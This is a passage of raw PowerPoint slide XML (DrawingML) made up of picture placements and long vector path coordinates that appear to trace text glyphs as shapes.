                    <a:pt x="664744" y="13500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="649482" y="8437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="632525" y="3375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598609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0" name="object 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{754C31EC-4378-05A2-D582-5FB2AE471F7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51902" y="2671805"/>
              <a:ext cx="1344751" cy="838733"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="31" name="object 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3337FDD5-5AC2-343A-A0EC-F28A73DB426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7812" y="2640838"/>
              <a:ext cx="1448235" cy="932180"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="32" name="object 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{342AFDD3-E47D-94A7-7B75-E3188FFAD29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8676" y="3369681"/>
              <a:ext cx="777488" cy="677422"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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B4425C42-993E-3A7C-E546-72EBB01D84EF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="938911" y="4081030"/>
              <a:ext cx="737235" cy="280035"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="737235" h="280035">
                  <a:moveTo>
                    <a:pt x="65697" y="212051"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="51803" y="182270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51803" y="204482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51803" y="210896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30022" y="228854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13360" y="228854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13360" y="188722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30810" y="188722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51803" y="204482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51803" y="182270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50457" y="181368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46748" y="179781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38379" y="177749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33274" y="177253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="177253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="277672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13360" y="277672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13360" y="240233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33909" y="240233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64922" y="216179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65697" y="212051"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="737235" h="280035">
                  <a:moveTo>
                    <a:pt x="101307" y="4508"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="82740" y="4508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56845" y="60426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36728" y="18402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30073" y="4508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11861" y="4508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11861" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24333" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24333" y="18402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52057" y="77266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60020" y="77266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68008" y="60426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87934" y="18402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87934" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101307" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101307" y="18402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101307" y="4508"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="737235" h="280035">
                  <a:moveTo>
                    <a:pt x="145554" y="240030"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144970" y="231317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143192" y="223558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140246" y="216763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136271" y="211175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136118" y="210947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132473" y="207619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132473" y="230276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132473" y="249580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130632" y="256514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130556" y="256755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122859" y="266420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117576" y="268846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104000" y="268846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89115" y="230276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91008" y="223024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98602" y="213537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103949" y="211175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117614" y="211175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122923" y="213537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130556" y="223024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132473" y="230276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132473" y="207619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130987" y="206260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125069" y="202920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118338" y="200914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110820" y="200240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103238" y="200914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76606" y="231317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76022" y="240030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76606" y="248754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103238" y="279107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110820" y="279768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118338" y="279107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144970" y="248754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145554" y="240030"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="737235" h="280035">
                  <a:moveTo>
                    <a:pt x="189318" y="48945"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="188582" y="44881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186118" y="39420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185991" y="39154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185915" y="38976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161836" y="27774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151993" y="27774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146875" y="28219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147129" y="28219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138036" y="29806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134467" y="30543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131978" y="31229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131978" y="44157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132486" y="44157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137020" y="42430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141262" y="41160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149440" y="39420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153149" y="38976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159219" y="38976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175183" y="46062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176199" y="47929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176720" y="50330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176720" y="55156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176720" y="65417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176720" y="86385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173558" y="88811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170154" y="90881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162763" y="94361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158699" y="95224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148894" y="95224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144919" y="94132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139700" y="89776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138391" y="86525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138391" y="78371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176720" y="65417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176720" y="55156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134937" y="62903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129006" y="69227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126542" y="72745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125323" y="77355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125323" y="90043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127673" y="95783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137109" y="104775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142862" y="107022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153352" y="107022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156578" y="106667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162039" y="105270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164477" y="104406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166598" y="103365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168389" y="102552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170243" y="101473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175590" y="97663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176720" y="96913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176720" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189318" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189318" y="96913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189318" y="95224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189318" y="65417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189318" y="48945"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="737235" h="280035">
                  <a:moveTo>
                    <a:pt x="214858" y="203174"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="211226" y="202615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200190" y="202615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197548" y="203174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189839" y="206565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185394" y="209435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180352" y="213474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180352" y="202615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167690" y="202615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167690" y="277672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180352" y="277672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180352" y="224205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183743" y="221449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187248" y="219214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194538" y="215760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197827" y="214985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206756" y="214985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210312" y="215392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212331" y="215760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214033" y="216166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214706" y="216166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214706" y="214985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214706" y="213474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214706" y="203174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214858" y="203174"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="737235" h="280035">
                  <a:moveTo>
                    <a:pt x="229057" y="29603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="216382" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216382" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229057" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229057" y="29603"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="737235" h="280035">
                  <a:moveTo>
                    <a:pt x="229870" y="3835"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="215569" y="3835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215569" y="16979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229870" y="16979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229870" y="3835"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="737235" h="280035">
                  <a:moveTo>
                    <a:pt x="267512" y="202336"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="241338" y="202336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241338" y="180682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228663" y="180682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228663" y="202336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220103" y="202336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220103" y="213004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228663" y="213004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228663" y="262178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230657" y="268820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238671" y="277088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244525" y="279158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254419" y="279158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256921" y="278955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262547" y="278142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265137" y="277622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267169" y="277088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267512" y="277088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267512" y="268033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267512" y="265595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266839" y="265595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265849" y="266001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264236" y="266522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259740" y="267716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257581" y="268033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251955" y="268033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250012" y="267716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249542" y="267716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241338" y="213004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267512" y="213004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267512" y="202336"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="737235" h="280035">
                  <a:moveTo>
                    <a:pt x="268097" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="255435" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255435" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268097" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268097" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="737235" h="280035">
                  <a:moveTo>
                    <a:pt x="311416" y="258457"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="295313" y="258457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295313" y="277672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311416" y="277672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311416" y="258457"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="737235" h="280035">
                  <a:moveTo>
                    <a:pt x="311416" y="202336"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="295313" y="202336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295313" y="221564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311416" y="221564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311416" y="202336"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="737235" h="280035">
                  <a:moveTo>
                    <a:pt x="422960" y="11531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="416420" y="8242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410425" y="5956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="399707" y="3340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394309" y="2679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381546" y="2679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345528" y="26123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339674" y="46558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339674" y="63538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357835" y="98425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381571" y="106756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392722" y="106756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418274" y="99733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420509" y="98717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422960" y="97637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422960" y="95224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422960" y="82003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422046" y="82003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417144" y="86410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413385" y="88760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411645" y="89801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400634" y="94107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394601" y="95224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="383489" y="95224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354533" y="67945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353568" y="61887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353568" y="48069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378383" y="14897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382943" y="14084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394233" y="14084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400062" y="15151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410946" y="19367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416445" y="22733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421970" y="27368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422960" y="27368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422960" y="14084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422960" y="11531"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="737235" h="280035">
                  <a:moveTo>
                    <a:pt x="456577" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="443877" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443877" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456577" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456577" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="737235" h="280035">
                  <a:moveTo>
                    <a:pt x="459752" y="267423"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="439254" y="267423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439254" y="176911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428790" y="176911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408216" y="190944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405396" y="190944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405396" y="200101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426288" y="200101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426288" y="267423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405396" y="267423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405396" y="277672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459752" y="277672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459752" y="267423"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="737235" h="280035">
                  <a:moveTo>
                    <a:pt x="495617" y="29603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="482955" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482955" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="495617" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="495617" y="29603"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="737235" h="280035">
                  <a:moveTo>
                    <a:pt x="496430" y="3835"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="482142" y="3835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482142" y="16979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="496430" y="16979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="496430" y="3835"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="737235" h="280035">
                  <a:moveTo>
                    <a:pt x="555802" y="227571"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="547471" y="188201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="545922" y="186359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="542696" y="182524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="542099" y="182130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="542099" y="220586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="542086" y="234581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="541845" y="240042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="541807" y="240436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540727" y="249897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540702" y="250126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="539711" y="254114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="539635" y="254419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536651" y="261340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536549" y="261594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="534377" y="264261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528802" y="267754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525297" y="268643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516585" y="268643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="504024" y="258051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502310" y="254114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="501319" y="250126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="501269" y="249897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500278" y="240436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500024" y="234581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500049" y="220586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516826" y="186359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525348" y="186359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528840" y="187236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="534263" y="190741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536448" y="193395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="537997" y="196811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="539623" y="200304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540626" y="204292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540702" y="204622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="541832" y="214668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="542099" y="220586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="542099" y="182130"/>
                  </a:lnTo>
                  <a:lnTo>
